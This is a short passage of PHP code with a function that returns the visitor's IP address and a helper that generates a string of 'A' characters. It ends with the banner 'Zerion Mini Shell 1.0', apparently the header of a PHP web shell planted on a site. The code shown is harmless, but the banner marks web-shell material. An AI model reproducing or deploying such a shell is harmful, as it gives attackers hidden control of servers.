} elseif (isset($_SERVER["REMOTE_ADDR"])) {
return $_SERVER["REMOTE_ADDR"];
} else {
return "IP não encontrado";
}
}
function gerarAAAA($length = 10) {
$characters = 'A';
$charactersLength = strlen($characters);
$randomString = '';
for ($i = 0; $i < $length; $i++) {
$randomString .= $characters[rand(0, $charactersLength - 1)];
}
return $randomString;
}
?>
Zerion Mini Shell 1.0